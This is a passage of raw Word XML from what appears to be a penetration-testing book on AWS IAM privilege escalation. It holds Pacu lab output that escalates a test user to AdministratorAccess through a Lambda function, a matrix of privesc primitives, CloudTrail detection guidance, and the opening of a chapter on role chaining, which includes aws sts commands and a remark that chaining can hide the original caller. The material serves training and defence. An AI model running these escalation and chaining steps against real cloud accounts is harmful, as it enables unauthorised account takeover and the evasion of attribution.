          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>run iam__privesc_scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A5049C"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Scanning user 'cg-kittens-cgid-kittens' against 31 privesc primitives...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AEBBFF"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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Confirmed permissions loaded (117 allowed actions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086F1210"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Testing primitive: CreateAccessKey ... </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="r"/>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>VULNERABLE (iam:CreateAccessKey on *)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28149CEC"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Testing primitive: AttachUserPolicy ... not vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D4CA8C"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Testing primitive: CreatePolicyVersion ... </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="r"/>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>VULNERABLE (iam:CreatePolicyVersion + SetAsDefault)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336B3B45"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Testing primitive: PassRole+Lambda ... </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="r"/>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>VULNERABLE (iam:PassRole on * + lambda:CreateFunction)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CD9AD0"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Testing primitive: UpdateAssumeRolePolicy ... not vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B8E1BF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB94177"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 xml:space="preserve">  3 primitives available. Run 'exploit' to proceed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A114D6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Pacu (demo:cgkitten) &gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>run iam__privesc_scan --exploit --path 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D3DDE3"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 Creating Lambda function 'pwner-tmp-3k29'...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF4030A"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 Invoking...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12256B9B"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 Policy AdministratorAccess attached to user cg-kittens-cgid-kittens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409DCC09" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  [+] Escalation complete. Refresh credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A94DFD" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>8.33  The full matrix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2198C8"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Primitiv</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Prereq </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>1</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Prereq </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>2</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Target typ</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CreateAccessKey on use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iam:CreateAccessKe</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 use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AttachUserPolicy (Admin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iam:AttachUserPolic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Self or other use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CreatePolicyVersion SetDefaul</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iam:CreatePolicyVersio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SetAsDefault=tru</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Customer-managed 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UpdateAssumeRolePolic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iam:UpdateAssumeRolePolic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Privileged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PassRole + RunInstance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iam:PassRole on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ec2:RunInstance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instance profil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PassRole + CreateFunctio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iam:PassRole on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lambda:CreateFunctio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 exec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PassRole + CFN CreateStac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>k</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iam:PassRol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cfn:CreateStac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>k</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CFN service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UpdateFunctionCode (existing</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lambda:UpdateFunctionCod</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lambda:InvokeFunctio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Existing privileged Lambd</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SSM SendComman</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ssm:SendComman</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target has SSM agen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instance profil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CodeBuild UpdateProjec</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codebuild:UpdateProjec</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codebuild:StartBuil</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CodeBuild service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AddUserToGroup (admins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iam:AddUserToGrou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>p</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Privileged grou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>p</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UpdateLoginProfile (target</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iam:UpdateLoginProfil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Console-enabled use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IC permission-set attac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>h</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sso:AttachManagedPolicyTo..</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Identity Center perm-se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Privilege-escalation matrix (core twelve of thirty-one primitives). Full table is in Appendix B. Prerequisites columns are the minimum IAM actions needed on the attacker's principal; the target type column is what the exploit hits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75EF217F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>8.34  Detection strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E4FFA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An IAM privesc detection strategy has three pillars:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7930362E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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High-signal management events.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Alert on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AttachUserPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AttachRolePolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>PutUserPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>PutRolePolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CreatePolicyVersion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>SetDefaultPolicyVersion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>UpdateAssumeRolePolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CreateAccessKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for someone other than self), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>UpdateLoginProfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CreateLoginProfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499B6970" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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PassRole observability.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Every </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:PassRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> in CloudTrail — which is present as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>requestParameters.roleName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on most compute-service create calls — should be parsed and alerted on when the passed role is administrative.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A28C8B9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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Access Analyzer + findings mono-loop.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Detect any new policy attachment that expands the external-reachability of a role or bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A955A5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30477F1F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Thirty-plus privesc primitives exist; a handful (CreateAccessKey, AttachUserPolicy, PassRole + compute, UpdateAssumeRolePolicy) cover 80 percent of real engagements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E49C7B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Pacu's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam__privesc_scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> automates discovery and optional exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A53FAD0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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matrix in Appendix B is the operator's reference; keep it printed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C9FF7E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Detection is the defender's only viable backstop; IAM write-event alerts must be high-confidence and tested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5B370E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="1668971523"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>IAM Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385BC2FF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="72"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Cross-Account Attacks and Role Chaining</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33546FE1" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:spacing w:before="240" w:after="48"/>
        <w:outlineLvl w:val="4"/>
        <w:divId w:val="650016303"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:spacing w:val="20"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:spacing w:val="20"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Chapter Goal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4954C9E7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="650016303"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Move from inside-one-account privesc to cross-account lateral movement. Cover STS role chaining, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>OrganizationAccountAccessRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> pathway, resource-policy abuse, AWS RAM shares, and the confused-deputy landscape before and after the March 2022 AWS behavior change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D2817A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="lead"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">A single AWS account compromise is often a finding; a cross-account compromise is usually a critical one. The identity primitives that move you between accounts are small in number — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, resource-policy share, RAM share — but the paths they trace through a multi-account organization can be deep.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABE0801" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>9.1  Role chaining mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5745CA4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Role chaining is the sequential assumption of one role from inside another's session. It is how almost every cross-account attack propagates. Two rules govern it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6EF82A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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A chained session inherits a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>maximum session duration of one hour</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, regardless of the target role's configured maximum. This is AWS-enforced; an operator planning a long-lived session must re-chain periodically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B333753" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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The CloudTrail record for a chained </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the target account shows the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>source role session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the caller, not the original user. This is useful for defenders doing attribution but can also be used offensively: inserting an intermediate role into the chain obscures the original principal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DE63B6"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 Step 1: base user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA420EC"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sts get-caller-identity --profile base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8FD57A"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{"Arn":"arn:aws:iam::111122223333:user/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>base-operator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFD77B2"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 Step 2: assume staging role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E5C15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sts assume-role --role-arn arn:aws:iam::111122223333:role/staging-pipe --role-session-name pipe1 --profile base</w:t>
      </w:r>
    </w:p>
